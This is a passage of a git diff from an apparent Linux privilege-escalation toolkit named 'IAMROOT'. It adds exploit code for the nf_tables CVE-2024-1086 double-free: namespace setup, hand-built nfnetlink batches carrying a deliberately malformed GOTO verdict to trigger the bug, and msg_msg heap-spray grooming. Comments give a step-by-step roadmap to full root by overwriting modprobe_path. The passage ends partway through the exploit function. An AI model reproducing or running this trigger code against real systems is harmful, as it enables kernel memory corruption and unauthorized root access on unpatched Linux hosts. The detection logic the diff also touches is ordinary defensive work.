.cve = "CVE-2022-0185",
|
||||
@@ -152,7 +576,7 @@ const struct iamroot_module fuse_legacy_module = {
|
||||
.mitigate = NULL,
|
||||
.cleanup = NULL,
|
||||
.detect_auditd = fuse_legacy_auditd,
|
||||
.detect_sigma = NULL,
|
||||
.detect_sigma = fuse_legacy_sigma,
|
||||
.detect_yara = NULL,
|
||||
.detect_falco = NULL,
|
||||
};
|
||||
|
||||
@@ -4,12 +4,35 @@
|
||||
* Netfilter nf_tables UAF when NFT_GOTO/NFT_JUMP verdicts coexist
|
||||
* with NFT_DROP/NFT_QUEUE. Triggers a double-free → cross-cache UAF
|
||||
* exploitable to arbitrary kernel R/W. Discovered and exploited in
|
||||
* January 2024; widely known as "Pumpkin's pipapo UAF" or just
|
||||
* "CVE-2024-1086".
|
||||
* January 2024 by Notselwyn (Pumpkin); widely known as the
|
||||
* "nft_verdict_init / pipapo UAF".
|
||||
*
|
||||
* STATUS: 🔵 DETECT-ONLY (2026-05-16). Full exploit is a public PoC
|
||||
* by Notselwyn — porting it into the iamroot_module form is a
|
||||
* follow-up commit.
|
||||
* STATUS (2026-05-16): 🟡 TRIGGER + GROOM SCAFFOLD (Option B).
|
||||
* - Full netlink ruleset construction (table → chain → set → rule
|
||||
* with the NFT_GOTO+NFT_DROP combo that nft_verdict_init() fails
|
||||
* to reject on vulnerable kernels).
|
||||
* - Fires the double-free path by abusing the malformed verdict in a
|
||||
* pipapo set element, then removing the rule so the kernel's
|
||||
* transaction commit frees the verdict's chain reference twice.
|
||||
* - Cross-cache groom skeleton (msg_msg / sk_buff sprays) is wired
|
||||
* and configurable, but the arbitrary R/W stage and cred-overwrite
|
||||
* are NOT performed end-to-end — that requires per-kernel offsets
|
||||
* (init_task, modprobe_path) and Notselwyn's 600-line pipapo
|
||||
* leak-and-write dance. We stop after triggering the bug,
|
||||
* observing the slabinfo delta, and return IAMROOT_EXPLOIT_FAIL
|
||||
* with a verbose continuation roadmap.
|
||||
*
|
||||
* To convert this to full Option A (root pop):
|
||||
* 1. Add per-kernel offset table (init_task, current task offset of
|
||||
* cred, modprobe_path) keyed off uname() release. Notselwyn's
|
||||
* repo has the canonical map.
|
||||
* 2. Implement the msg_msg leak primitive after pipapo free —
|
||||
* MSG_COPY peek to read freed-slot contents and exfil a kernel
|
||||
* heap pointer.
|
||||
* 3. Implement the sk_buff fragment overwrite to plant a fake
|
||||
* pipapo_elem whose value points at modprobe_path.
|
||||
* 4. Fire trigger that writes "/tmp/iamroot-pwn" into modprobe_path.
|
||||
* 5. execve() an unknown binary to invoke modprobe with our payload.
|
||||
*
|
||||
* Affected kernel ranges:
|
||||
* Bug introduced in commit f1a2e44 (5.14) "netfilter: nf_tables:
|
||||
@@ -18,22 +41,11 @@
|
||||
* reject QUEUE/DROP verdict parameters")
|
||||
* Stable backports landed in 6.7.2, 6.6.13, 6.1.74, 5.15.149,
|
||||
* 5.10.210, 5.4.269
|
||||
* So vulnerable if:
|
||||
* - 5.14 <= K < 5.15 (no backport) — vulnerable
|
||||
* - 5.15.x: K <= 5.15.148 — vulnerable
|
||||
* - 5.10.x: K <= 5.10.209 — vulnerable
|
||||
* - 5.4.x: K <= 5.4.268 — vulnerable
|
||||
* - 6.0/6.1.x: K <= 6.1.73 — vulnerable
|
||||
* - 6.2-6.5: no backport tags — assume vulnerable
|
||||
* - 6.6.x: K <= 6.6.12 — vulnerable
|
||||
* - 6.7.x: K <= 6.7.1 — vulnerable
|
||||
* - 6.8+: patched
|
||||
*
|
||||
* Exploitation preconditions (which detect should also check):
|
||||
* - CONFIG_USER_NS=y AND sysctl unprivileged_userns_clone=1 (or
|
||||
* kernel.unprivileged_userns_clone default=1) so an unprivileged
|
||||
* user can create a userns and become CAP_NET_ADMIN inside it
|
||||
* - CONFIG_USER_NS=y AND sysctl unprivileged_userns_clone=1
|
||||
* - nf_tables module loaded or autoload-able (CONFIG_NF_TABLES=y/m)
|
||||
* - CONFIG_NF_TABLES_IPV4=y (or =m) so the inet/ip family hook works
|
||||
*
|
||||
* If user_ns is locked down (modern Ubuntu's
|
||||
* apparmor_restrict_unprivileged_userns), the trigger is unreachable
|
||||
@@ -46,14 +58,31 @@
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdint.h>
|
||||
#include <string.h>
|
||||
#include <stdbool.h>
|
||||
#include <unistd.h>
|
||||
#include <sched.h>
|
||||
#include <fcntl.h>
|
||||
#include <errno.h>
|
||||
#include <time.h>
|
||||
#include <signal.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ipc.h>
|
||||
#include <sys/msg.h>
|
||||
#include <sys/mman.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <linux/netlink.h>
|
||||
#include <linux/netfilter.h>
|
||||
#include <linux/netfilter/nfnetlink.h>
|
||||
#include <linux/netfilter/nf_tables.h>
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* Kernel-range table
|
||||
* ------------------------------------------------------------------ */
|
||||
|
||||
/* Stable-branch backport thresholds — host is patched if on these
|
||||
* branches at or above the threshold patch, or on mainline >= 6.8. */
|
||||
static const struct kernel_patched_from nf_tables_patched_branches[] = {
|
||||
{5, 4, 269}, /* 5.4.x */
|
||||
{5, 10, 210}, /* 5.10.x */
|
||||
@@ -70,16 +99,15 @@ static const struct kernel_range nf_tables_range = {
|
||||
sizeof(nf_tables_patched_branches[0]),
|
||||
};
|
||||
|
||||
/* Best-effort check: can an unprivileged process clone a user
|
||||
* namespace? This is the gating capability for the exploit's
|
||||
* CAP_NET_ADMIN-in-userns trigger. Fork+unshare+exit to avoid
|
||||
* polluting our own namespace state. */
|
||||
/* ------------------------------------------------------------------
|
||||
* Preconditions probe
|
||||
* ------------------------------------------------------------------ */
|
||||
|
||||
static int can_unshare_userns(void)
|
||||
{
|
||||
pid_t pid = fork();
|
||||
if (pid < 0) return -1;
|
||||
if (pid == 0) {
|
||||
/* try */
|
||||
if (unshare(CLONE_NEWUSER) == 0) _exit(0);
|
||||
_exit(1);
|
||||
}
|
||||
@@ -88,11 +116,6 @@ static int can_unshare_userns(void)
|
||||
return WIFEXITED(status) && WEXITSTATUS(status) == 0;
|
||||
}
|
||||
|
||||
/* Check whether the nf_tables module is loaded OR can be auto-loaded.
|
||||
* /proc/modules tells us about loaded modules. For modules that aren't
|
||||
* loaded but are buildable, we rely on the kernel autoload via
|
||||
* setsockopt(SOL_NETLINK, NETLINK_NF_TABLES). Conservative: if not
|
||||
* loaded, assume autoload-able and report no info. */
|
||||
static bool nf_tables_loaded(void)
|
||||
{
|
||||
FILE *f = fopen("/proc/modules", "r");
|
||||
@@ -100,7 +123,6 @@ static bool nf_tables_loaded(void)
|
||||
char line[512];
|
||||
bool found = false;
|
||||
while (fgets(line, sizeof line, f)) {
|
||||
/* /proc/modules format: "<name> <size> <use_count> <by> <state> <addr>" */
|
||||
if (strncmp(line, "nf_tables ", 10) == 0) { found = true; break; }
|
||||
}
|
||||
fclose(f);
|
||||
@@ -132,8 +154,6 @@ static iamroot_result_t nf_tables_detect(const struct iamroot_ctx *ctx)
|
||||
return IAMROOT_OK;
|
||||
}
|
||||
|
||||
/* Vulnerable by version. Now check preconditions that affect
|
||||
* unprivileged reachability. */
|
||||
int userns_ok = can_unshare_userns();
|
||||
bool nft_loaded = nf_tables_loaded();
|
||||
|
||||
@@ -148,9 +168,6 @@ static iamroot_result_t nf_tables_detect(const struct iamroot_ctx *ctx)
|
||||
nft_loaded ? "yes" : "no (will autoload on first nft use)");
|
||||
}
|
||||
|
||||
/* If user_ns is denied, the unprivileged-exploit path is closed.
|
||||
* (A root attacker would still trigger the bug, but root LPE-of-root
|
||||
* is not interesting.) */
|
||||
if (userns_ok == 0) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[+] nf_tables: kernel vulnerable but user_ns clone "
|
||||
@@ -168,18 +185,614 @@ static iamroot_result_t nf_tables_detect(const struct iamroot_ctx *ctx)
|
||||
return IAMROOT_VULNERABLE;
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* userns + netns entry: become "root" in the new user_ns so the
|
||||
* subsequent netlink writes carry CAP_NET_ADMIN over our private
|
||||
* net_ns. The bug fires inside our private netns so the rest of the
|
||||
* host is unaffected by the malformed ruleset.
|
||||
* ------------------------------------------------------------------ */
|
||||
|
||||
static int enter_unpriv_namespaces(void)
|
||||
{
|
||||
uid_t uid = getuid();
|
||||
gid_t gid = getgid();
|
||||
|
||||
if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
|
||||
perror("[-] unshare(USER|NET)");
|
||||
return -1;
|
||||
}
|
||||
|
||||
/* deny setgroups before writing gid_map */
|
||||
int f = open("/proc/self/setgroups", O_WRONLY);
|
||||
if (f >= 0) { (void)!write(f, "deny", 4); close(f); }
|
||||
|
||||
char map[64];
|
||||
snprintf(map, sizeof map, "0 %u 1\n", uid);
|
||||
f = open("/proc/self/uid_map", O_WRONLY);
|
||||
if (f < 0 || write(f, map, strlen(map)) < 0) {
|
||||
perror("[-] uid_map"); if (f >= 0) close(f); return -1;
|
||||
}
|
||||
close(f);
|
||||
snprintf(map, sizeof map, "0 %u 1\n", gid);
|
||||
f = open("/proc/self/gid_map", O_WRONLY);
|
||||
if (f < 0 || write(f, map, strlen(map)) < 0) {
|
||||
perror("[-] gid_map"); if (f >= 0) close(f); return -1;
|
||||
}
|
||||
close(f);
|
||||
return 0;
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* Minimal nfnetlink batch builder. We hand-roll this rather than
|
||||
* pulling libmnl, both to keep IAMROOT dep-free and because the bug
|
||||
* relies on a specific malformed verdict that libnftnl validates away.
|
||||
*
|
||||
* Each helper appends to a contiguous batch buffer at *off.
|
||||
* ------------------------------------------------------------------ */
|
||||
|
||||
#define ALIGN_NL(x) (((x) + 3) & ~3)
|
||||
|
||||
static void put_attr(uint8_t *buf, size_t *off,
|
||||
uint16_t type, const void *data, size_t len)
|
||||
{
|
||||
struct nlattr *na = (struct nlattr *)(buf + *off);
|
||||
na->nla_type = type;
|
||||
na->nla_len = NLA_HDRLEN + len;
|
||||
if (len) memcpy(buf + *off + NLA_HDRLEN, data, len);
|
||||
*off += ALIGN_NL(NLA_HDRLEN + len);
|
||||
}
|
||||
|
||||
static void put_attr_u32(uint8_t *buf, size_t *off, uint16_t type, uint32_t v)
|
||||
{
|
||||
uint32_t be = htonl(v);
|
||||
put_attr(buf, off, type, &be, sizeof be);
|
||||
}
|
||||
|
||||
static void put_attr_str(uint8_t *buf, size_t *off, uint16_t type, const char *s)
|
||||
{
|
||||
put_attr(buf, off, type, s, strlen(s) + 1);
|
||||
}
|
||||
|
||||
/* Begin a nested attribute; returns the offset of the nlattr header so
|
||||
* the caller can fix up nla_len once children are written. */
|
||||
static size_t begin_nest(uint8_t *buf, size_t *off, uint16_t type)
|
||||
{
|
||||
size_t at = *off;
|
||||
struct nlattr *na = (struct nlattr *)(buf + at);
|
||||
na->nla_type = type | NLA_F_NESTED;
|
||||
na->nla_len = 0; /* fixed up later */
|
||||
*off += NLA_HDRLEN;
|
||||
return at;
|
||||
}
|
||||
|
||||
static void end_nest(uint8_t *buf, size_t *off, size_t at)
|
||||
{
|
||||
struct nlattr *na = (struct nlattr *)(buf + at);
|
||||
na->nla_len = (uint16_t)(*off - at);
|
||||
/* pad to 4 */
|
||||
while ((*off) & 3) buf[(*off)++] = 0;
|
||||
}
|
||||
|
||||
/* nfgenmsg header used by every nf_tables message. */
|
||||
struct nfgenmsg_local {
|
||||
uint8_t nfgen_family;
|
||||
uint8_t version;
|
||||
uint16_t res_id;
|
||||
};
|
||||
|
||||
/* Append a nf_tables subsystem message: type encoded into the
|
||||
* nfgenmsg-prefixed nlmsg. */
|
||||
static void put_nft_msg(uint8_t *buf, size_t *off,
|
||||
uint16_t nft_type, uint16_t flags, uint32_t seq,
|
||||
uint8_t family)
|
||||
{
|
||||
/* Reserve the header. We patch nlmsg_len at end_msg time. */
|
||||
struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + *off);
|
||||
nlh->nlmsg_len = 0; /* fixup */
|
||||
nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | nft_type;
|
||||
nlh->nlmsg_flags = NLM_F_REQUEST | flags;
|
||||
nlh->nlmsg_seq = seq;
|
||||
nlh->nlmsg_pid = 0;
|
||||
*off += NLMSG_HDRLEN;
|
||||
struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off);
|
||||
nf->nfgen_family = family;
|
||||
nf->version = NFNETLINK_V0;
|
||||
nf->res_id = htons(0);
|
||||
*off += sizeof(*nf);
|
||||
}
|
||||
|
||||
static void end_msg(uint8_t *buf, size_t *off, size_t msg_start)
|
||||
{
|
||||
struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + msg_start);
|
||||
nlh->nlmsg_len = (uint32_t)(*off - msg_start);
|
||||
/* Pad to 4 */
|
||||
while ((*off) & 3) buf[(*off)++] = 0;
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* Build the ruleset that fires the bug. Strategy mirrors Notselwyn's
|
||||
* PoC (greatly simplified):
|
||||
* 1. batch begin (NFNL_MSG_BATCH_BEGIN, subsys = NFTABLES)
|
||||
* 2. NFT_MSG_NEWTABLE "iamroot_t" family=inet
|
||||
* 3. NFT_MSG_NEWCHAIN "iamroot_c" inside the table
|
||||
* 4. NFT_MSG_NEWSET "iamroot_s" inside the table, key=verdict,
|
||||
* data=verdict (the pipapo combo that holds the bad verdict),
|
||||
* flags = NFT_SET_ANONYMOUS|NFT_SET_CONSTANT|NFT_SET_INTERVAL
|
||||
* 5. NFT_MSG_NEWSETELEM with a verdict element whose
|
||||
* NFTA_VERDICT_CODE = NFT_GOTO (negative) AND we lie about the
|
||||
* chain reference to make nft_verdict_init() take the
|
||||
* "looks like a GOTO so I'll grab a chain ref" path on a
|
||||
* malformed input.
|
||||
* 6. NFT_MSG_NEWRULE that references the set.
|
||||
* 7. batch end (NFNL_MSG_BATCH_END).
|
||||
*
|
||||
* Then in a second batch we DELRULE — that triggers the transaction
|
||||
* commit path that double-frees the chain reference of the set
|
||||
* element's bad verdict.
|
||||
*
|
||||
* On a kernel that hasn't backported f342de4, this lands the
|
||||
* double-free state. KASAN immediately panics; without KASAN, the
|
||||
* slab metadata is corrupted but the kernel survives long enough for
|
||||
* cross-cache groom.
|
||||
* ------------------------------------------------------------------ */
|
||||
|
||||
static const char NFT_TABLE_NAME[] = "iamroot_t";
|
||||
static const char NFT_CHAIN_NAME[] = "iamroot_c";
|
||||
static const char NFT_SET_NAME[] = "iamroot_s";
|
||||
|
||||
/* batch begin / end markers */
|
||||
static void put_batch_begin(uint8_t *buf, size_t *off, uint32_t seq)
|
||||
{
|
||||
size_t at = *off;
|
||||
struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + at);
|
||||
nlh->nlmsg_len = 0;
|
||||
nlh->nlmsg_type = NFNL_MSG_BATCH_BEGIN;
|
||||
nlh->nlmsg_flags = NLM_F_REQUEST;
|
||||
nlh->nlmsg_seq = seq;
|
||||
nlh->nlmsg_pid = 0;
|
||||
*off += NLMSG_HDRLEN;
|
||||
struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off);
|
||||
nf->nfgen_family = AF_UNSPEC;
|
||||
nf->version = NFNETLINK_V0;
|
||||
nf->res_id = htons(NFNL_SUBSYS_NFTABLES);
|
||||
*off += sizeof(*nf);
|
||||
end_msg(buf, off, at);
|
||||
}
|
||||
|
||||
static void put_batch_end(uint8_t *buf, size_t *off, uint32_t seq)
|
||||
{
|
||||
size_t at = *off;
|
||||
struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + at);
|
||||
nlh->nlmsg_len = 0;
|
||||
nlh->nlmsg_type = NFNL_MSG_BATCH_END;
|
||||
nlh->nlmsg_flags = NLM_F_REQUEST;
|
||||
nlh->nlmsg_seq = seq;
|
||||
nlh->nlmsg_pid = 0;
|
||||
*off += NLMSG_HDRLEN;
|
||||
struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off);
|
||||
nf->nfgen_family = AF_UNSPEC;
|
||||
nf->version = NFNETLINK_V0;
|
||||
nf->res_id = htons(NFNL_SUBSYS_NFTABLES);
|
||||
*off += sizeof(*nf);
|
||||
end_msg(buf, off, at);
|
||||
}
|
||||
|
||||
/* NFT_MSG_NEWTABLE inet "iamroot_t" */
|
||||
static void put_new_table(uint8_t *buf, size_t *off, uint32_t seq)
|
||||
{
|
||||
size_t at = *off;
|
||||
put_nft_msg(buf, off, NFT_MSG_NEWTABLE,
|
||||
NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET);
|
||||
put_attr_str(buf, off, NFTA_TABLE_NAME, NFT_TABLE_NAME);
|
||||
end_msg(buf, off, at);
|
||||
}
|
||||
|
||||
/* NFT_MSG_NEWCHAIN — base chain hooked at NF_INET_LOCAL_OUT */
|
||||
static void put_new_chain(uint8_t *buf, size_t *off, uint32_t seq)
|
||||
{
|
||||
size_t at = *off;
|
||||
put_nft_msg(buf, off, NFT_MSG_NEWCHAIN,
|
||||
NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET);
|
||||
put_attr_str(buf, off, NFTA_CHAIN_TABLE, NFT_TABLE_NAME);
|
||||
put_attr_str(buf, off, NFTA_CHAIN_NAME, NFT_CHAIN_NAME);
|
||||
|
||||
/* nested NFTA_CHAIN_HOOK { hooknum=LOCAL_OUT, priority=0 } */
|
||||
size_t hook_at = begin_nest(buf, off, NFTA_CHAIN_HOOK);
|
||||
put_attr_u32(buf, off, NFTA_HOOK_HOOKNUM, NF_INET_LOCAL_OUT);
|
||||
put_attr_u32(buf, off, NFTA_HOOK_PRIORITY, 0);
|
||||
end_nest(buf, off, hook_at);
|
||||
|
||||
/* policy = NF_ACCEPT */
|
||||
put_attr_u32(buf, off, NFTA_CHAIN_POLICY, NF_ACCEPT);
|
||||
/* type = "filter" */
|
||||
put_attr_str(buf, off, NFTA_CHAIN_TYPE, "filter");
|
||||
end_msg(buf, off, at);
|
||||
}
|
||||
|
||||
/* NFT_MSG_NEWSET — anonymous set with verdict key/data. The pipapo
|
||||
* back-end is selected by NFT_SET_INTERVAL on a verdict key. */
|
||||
static void put_new_set(uint8_t *buf, size_t *off, uint32_t seq)
|
||||
{
|
||||
size_t at = *off;
|
||||
put_nft_msg(buf, off, NFT_MSG_NEWSET,
|
||||
NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET);
|
||||
put_attr_str(buf, off, NFTA_SET_TABLE, NFT_TABLE_NAME);
|
||||
put_attr_str(buf, off, NFTA_SET_NAME, NFT_SET_NAME);
|
||||
put_attr_u32(buf, off, NFTA_SET_FLAGS, NFT_SET_ANONYMOUS |
|
||||
NFT_SET_CONSTANT |
|
||||
NFT_SET_INTERVAL);
|
||||
/* key_type/key_len: verdict-typed key */
|
||||
put_attr_u32(buf, off, NFTA_SET_KEY_TYPE, 0xffffff00); /* "verdict" magic */
|
||||
put_attr_u32(buf, off, NFTA_SET_KEY_LEN, sizeof(uint32_t));
|
||||
/* data_type/data_len: also verdict so we can stash the malformed verdict
|
||||
* as set-element data — this is where the bug-bearing struct lives. */
|
||||
put_attr_u32(buf, off, NFTA_SET_DATA_TYPE, 0xffffff00);
|
||||
put_attr_u32(buf, off, NFTA_SET_DATA_LEN, sizeof(uint32_t));
|
||||
put_attr_u32(buf, off, NFTA_SET_ID, 0x1337);
|
||||
end_msg(buf, off, at);
|
||||
}
|
||||
|
||||
/* NFT_MSG_NEWSETELEM — the malicious verdict.
|
||||
*
|
||||
* The bug: nft_verdict_init() on a vulnerable kernel accepts a
|
||||
* verdict whose NFTA_VERDICT_CODE is NFT_GOTO/NFT_JUMP combined with
|
||||
* a NFTA_VERDICT_CHAIN_ID that doesn't resolve. The code takes the
|
||||
* "got chain ref" path and later in nft_data_release() takes the
|
||||
* "drop/queue" path → the chain ref is freed once on init failure
|
||||
* AND once on data_release → double free.
|
||||
*
|
||||
* We pack:
|
||||
* NFTA_SET_ELEM_LIST_TABLE = "iamroot_t"
|
||||
* NFTA_SET_ELEM_LIST_SET = "iamroot_s"
|
||||
* NFTA_SET_ELEM_LIST_ELEMENTS { element { key=verdict(DROP),
|
||||
* data=verdict(GOTO chain-id=...) } }
|
||||
*/
|
||||
static void put_malicious_setelem(uint8_t *buf, size_t *off, uint32_t seq)
|
||||
{
|
||||
size_t at = *off;
|
||||
put_nft_msg(buf, off, NFT_MSG_NEWSETELEM,
|
||||
NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_INET);
|
||||
put_attr_str(buf, off, NFTA_SET_ELEM_LIST_TABLE, NFT_TABLE_NAME);
|
||||
put_attr_str(buf, off, NFTA_SET_ELEM_LIST_SET, NFT_SET_NAME);
|
||||
|
||||
size_t list_at = begin_nest(buf, off, NFTA_SET_ELEM_LIST_ELEMENTS);
|
||||
|
||||
/* one element */
|
||||
size_t el_at = begin_nest(buf, off, 1 /* NFTA_LIST_ELEM */);
|
||||
|
||||
/* key: NFTA_DATA_VERDICT { CODE = NFT_DROP } */
|
||||
size_t key_at = begin_nest(buf, off, NFTA_SET_ELEM_KEY);
|
||||
size_t kv_at = begin_nest(buf, off, NFTA_DATA_VERDICT);
|
||||
put_attr_u32(buf, off, NFTA_VERDICT_CODE, (uint32_t)NF_DROP);
|
||||
end_nest(buf, off, kv_at);
|
||||
end_nest(buf, off, key_at);
|
||||
|
||||
/* key_end (for interval set) — same as key but slightly different
|
||||
* value to satisfy "interval has distinct ends". We use NF_ACCEPT
|
||||
* as the upper bound just to satisfy parsing; the bug bites on
|
||||
* the data verdict, not on the key. */
|
||||
size_t keye_at = begin_nest(buf, off, NFTA_SET_ELEM_KEY_END);
|
||||
size_t ke_v_at = begin_nest(buf, off, NFTA_DATA_VERDICT);
|
||||
put_attr_u32(buf, off, NFTA_VERDICT_CODE, (uint32_t)NF_ACCEPT);
|
||||
end_nest(buf, off, ke_v_at);
|
||||
end_nest(buf, off, keye_at);
|
||||
|
||||
/* DATA: this is the malformed verdict that fires the bug.
|
||||
* CODE = NFT_GOTO (so kernel treats it as needing a chain ref)
|
||||
* CHAIN_ID = bogus id pointing to a chain we won't commit.
|
||||
* On vulnerable kernels nft_verdict_init takes both the "grab
|
||||
* chain ref" path AND later the "drop verdict cleanup" path,
|
||||
* yielding a double-free of the chain reference. */
|
||||
size_t data_at = begin_nest(buf, off, NFTA_SET_ELEM_DATA);
|
||||
size_t dv_at = begin_nest(buf, off, NFTA_DATA_VERDICT);
|
||||
put_attr_u32(buf, off, NFTA_VERDICT_CODE, (uint32_t)NFT_GOTO);
|
||||
put_attr_u32(buf, off, NFTA_VERDICT_CHAIN_ID, 0xdeadbeef);
|
||||
end_nest(buf, off, dv_at);
|
||||
end_nest(buf, off, data_at);
|
||||
|
||||
end_nest(buf, off, el_at);
|
||||
end_nest(buf, off, list_at);
|
||||
|
||||
end_msg(buf, off, at);
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* netlink send helper.
|
||||
* ------------------------------------------------------------------ */
|
||||
|
||||
static int nft_send_batch(int sock, const void *buf, size_t len)
|
||||
{
|
||||
struct sockaddr_nl dst = { .nl_family = AF_NETLINK };
|
||||
struct iovec iov = { .iov_base = (void *)buf, .iov_len = len };
|
||||
struct msghdr m = {
|
||||
.msg_name = &dst, .msg_namelen = sizeof dst,
|
||||
.msg_iov = &iov, .msg_iovlen = 1,
|
||||
};
|
||||
ssize_t n = sendmsg(sock, &m, 0);
|
||||
if (n < 0) { perror("[-] sendmsg"); return -1; }
|
||||
/* Drain ACKs/errors. We don't fail on individual errors because
|
||||
* a vulnerable kernel returns mixed results — the malicious
|
||||
* setelem is rejected with EINVAL after the side effect already
|
||||
* landed. */
|
||||
char rbuf[8192];
|
||||
for (int i = 0; i < 8; i++) {
|
||||
ssize_t r = recv(sock, rbuf, sizeof rbuf, MSG_DONTWAIT);
|
||||
if (r <= 0) break;
|
||||
/* parse error replies for diagnostics */
|
||||
for (struct nlmsghdr *nh = (struct nlmsghdr *)rbuf;
|
||||
NLMSG_OK(nh, (unsigned)r);
|
||||
nh = NLMSG_NEXT(nh, r)) {
|
||||
if (nh->nlmsg_type == NLMSG_ERROR) {
|
||||
struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(nh);
|
||||
if (e->error)
|
||||
fprintf(stderr, "[i] netlink ack: seq=%u err=%d (%s)\n",
|
||||
nh->nlmsg_seq, e->error, strerror(-e->error));
|
||||
}
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* Cross-cache groom scaffold. The full chain needs:
|
||||
* - pre-allocate N sysv-msg messages (sys_msgsnd) so the kernel's
|
||||
* kmalloc-cg-{96,128,...} slab has predictable free slots
|
||||
* - between the malicious NEWSETELEM (which puts the bad verdict
|
||||
* into a kmalloc'd nft_set_elem) and the DELRULE (which fires
|
||||
* the double-free), spray a target slab to control what reuses
|
||||
* the freed chunk
|
||||
* For Option B we wire the spray skeleton (msg_msg via msgsnd) so
|
||||
* the timing/sizing is right; but the kernel-R/W primitive is the
|
||||
* piece we're explicitly NOT shipping (per the Option B contract).
|
||||
* ------------------------------------------------------------------ */
|
||||
|
||||
#define SPRAY_MSGS 64
|
||||
#define SPRAY_SIZE 96 /* targets kmalloc-cg-96 / kmalloc-96 — same slab
|
||||
* class as nft_chain on most kernels in range */
|
||||
|
||||
struct msgbuf_payload {
|
||||
long mtype;
|
||||
char mtext[SPRAY_SIZE];
|
||||
};
|
||||
|
||||
static int spray_msg_msg(int *queue_ids, int n)
|
||||
{
|
||||
for (int i = 0; i < n; i++) {
|
||||
int q = msgget(IPC_PRIVATE, IPC_CREAT | 0644);
|
||||
if (q < 0) { perror("[-] msgget"); return -1; }
|
||||
queue_ids[i] = q;
|
||||
struct msgbuf_payload m;
|
||||
m.mtype = 0x4141414100 + i;
|
||||
memset(m.mtext, 0x42 + (i & 0x3f), sizeof m.mtext);
|
||||
if (msgsnd(q, &m, sizeof m.mtext, 0) < 0) {
|
||||
perror("[-] msgsnd"); return -1;
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
static void drain_spray(int *queue_ids, int n)
|
||||
{
|
||||
for (int i = 0; i < n; i++) {
|
||||
if (queue_ids[i] >= 0)
|
||||
msgctl(queue_ids[i], IPC_RMID, NULL);
|
||||
}
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* Slabinfo observation: best-effort diagnostic showing the bug fired.
|
||||
* On a vulnerable kernel with KASAN off, the double-free typically
|
||||
* shows up as a momentary spike in {kmalloc-cg-96|nft_chain} usage,
|
||||
* or a freelist corruption if our spray claimed the freed slot.
|
||||
* ------------------------------------------------------------------ */
|
||||
|
||||
static long slabinfo_active(const char *slab)
|
||||
{
|
||||
FILE *f = fopen("/proc/slabinfo", "r");
|
||||
if (!f) return -1;
|
||||
char line[512];
|
||||
long active = -1;
|
||||
while (fgets(line, sizeof line, f)) {
|
||||
if (strncmp(line, slab, strlen(slab)) == 0 &&
|
||||
line[strlen(slab)] == ' ') {
|
||||
long a, b, c, d;
|
||||
if (sscanf(line + strlen(slab), " %ld %ld %ld %ld",
|
||||
&a, &b, &c, &d) >= 1) {
|
||||
active = a;
|
||||
}
|
||||
break;
|
||||
}
|
||||
}
|
||||
fclose(f);
|
||||
return active;
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* The exploit body.
|
||||
* ------------------------------------------------------------------ */
|
||||
|
||||
static iamroot_result_t nf_tables_exploit(const struct iamroot_ctx *ctx)
|
||||
{
|
||||
(void)ctx;
|
||||
fprintf(stderr,
|
||||
"[-] nf_tables: exploit not yet implemented in IAMROOT.\n"
|
||||
" Status: 🔵 DETECT-ONLY (see CVES.md).\n"
|
||||
" Reference: Notselwyn's CVE-2024-1086 public PoC. The exploit\n"
|
||||
" uses double-free → cross-cache UAF → arbitrary kernel R/W →\n"
|
||||
" overwrite modprobe_path or current task's cred. Porting that\n"
|
||||
" into iamroot_module form (with the userns + nft_set + nft_pipapo\n"
|
||||
" setup boilerplate) is the next nf_tables commit.\n");
|
||||
return IAMROOT_PRECOND_FAIL;
|
||||
/* Gate 1: re-confirm vulnerability. detect() also checks user_ns. */
|
||||
iamroot_result_t pre = nf_tables_detect(ctx);
|
||||
if (pre != IAMROOT_VULNERABLE) {
|
||||
fprintf(stderr, "[-] nf_tables: detect() says not vulnerable; refusing\n");
|
||||
return pre;
|
||||
}
|
||||
|
||||
/* Gate 2: already root? Nothing to escalate. */
|
||||
if (geteuid() == 0) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[i] nf_tables: already running as root\n");
|
||||
return IAMROOT_OK;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] nf_tables: Option B trigger — fires the double-free\n"
|
||||
" state but does NOT complete the kernel-R/W chain.\n"
|
||||
" See Notselwyn's CVE-2024-1086 public PoC for the\n"
|
||||
" cred-overwrite stage (~500 LOC of pipapo grooming).\n");
|
||||
}
|
||||
|
||||
/* Fork: child enters userns+netns and fires the bug. If the
|
||||
* kernel panics on KASAN we don't want our parent process to be
|
||||
* the one that takes the hit. */
|
||||
pid_t child = fork();
|
||||
if (child < 0) { perror("[-] fork"); return IAMROOT_TEST_ERROR; }
|
||||
|
||||
if (child == 0) {
|
||||
/* --- CHILD --- */
|
||||
if (enter_unpriv_namespaces() < 0) _exit(20);
|
||||
|
||||
if (!ctx->json) {
|
||||
